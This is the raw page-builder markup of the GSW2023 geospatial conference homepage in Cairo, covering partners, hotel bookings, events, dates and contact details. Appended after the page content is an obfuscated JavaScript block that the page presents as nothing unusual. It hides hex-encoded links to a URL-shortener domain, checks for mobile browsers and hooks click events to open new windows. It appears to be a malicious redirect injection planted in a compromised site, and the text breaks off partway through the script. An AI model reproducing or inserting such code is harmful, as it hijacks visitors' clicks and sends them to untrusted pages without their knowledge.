Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a 